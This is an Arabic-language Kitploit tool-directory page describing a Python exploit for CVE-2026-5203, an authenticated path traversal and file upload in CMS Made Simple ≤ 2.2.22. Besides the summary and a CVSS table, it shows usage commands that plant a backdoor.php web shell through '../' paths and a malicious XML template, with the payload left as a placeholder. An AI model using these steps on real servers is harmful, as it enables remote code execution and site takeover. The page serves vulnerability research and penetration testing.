Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-5203 — استغلال Python لـ CVE-2026-5203: اجتياز مسار موثَّق ورفع ملف تعسفي في CMS Made Simple ≤ 2.22، مما يتيح تنفيذ التعليمات البرمجية عن بُعد عبر نشر قشرة ويب PHP. | Kitploit
أدوات/GitHubGitHub/caginkyr/cve-2026-5203
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubcaginkyr/cve-2026-5203

CVE-2026-5203

استغلال Python لـ CVE-2026-5203: اجتياز مسار موثَّق ورفع ملف تعسفي في CMS Made Simple ≤ 2.22، مما يتيح تنفيذ التعليمات البرمجية عن بُعد عبر نشر قشرة ويب PHP.

عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-5203 — CMS Made Simple ≤ 2.2.22 ثغرة تنفيذ أوامر عن بُعد (اختراق المسار + رفع ملفات تعسفي)

CVSS Version Type

ملخص

تفشل وظيفة استيراد XML لوحدة UserGuide في CMS Made Simple ≤ 2.2.22 في تعقيم أسماء الملفات المقدمة من المستخدم، مما يسمح لمسؤول مخول برفع ملفات تعسفية (مثل قذائف الويب PHP) في أي مكان على نظام ملفات الخادم عبر تسلسلات اختراق المسار.

الحقلالقيمة
النوعاختراق المسار / رفع ملفات تعسفي ← ثغرة تنفيذ أوامر عن بُعد
المكونوحدة UserGuide — استيراد XML
الملف المتأثرmodules/UserGuide/lib/class.UserGuideImporterExporter.php
CVSS v3.17.2 HIGH — CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
مطلوب مصادقةنعم (مسؤول)

الكود القابل للثغرة

root@kitploit:~
// modules/UserGuide/lib/class.UserGuideImporterExporter.php (~L250-280)
$filename = (string) $xmlFile->filename;
$isdir    = (string) $xmlFile->isdir;   

تكتب الدالة المحتوى المفكوك من Base64 مباشرة إلى المسار الذي يتحكم به المهاجم.


الاستخدام

root@kitploit:~
python exploit.py <base_url> <admin_url> <username> <password> [upload_path]

أمثلة:

root@kitploit:~
# Default path
python exploit.py http://target.com http://target.com/admin admin password123

# Custom upload path
python exploit.py http://target.com http://target.com/admin admin password123 \
  ../../../../../../var/www/html/backdoor.php

يبدأ شيل التفاعل تلقائيًا إذا كانت قذيفة الويب قابلة للوصول بعد الرفع.


بنية XML الخبيثة

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<modulecontent>
  <module>UserGuide</module>
  <version>1.3</version>
  <files>
    <file>
      <filename>../../../webshell.php</filename>
      <isdir>0</isdir>
      <data>[BASE64_ENCODED_PHP_CODE]</data>
    </file>
  </files>
</modulecontent>
تنزيل الأداة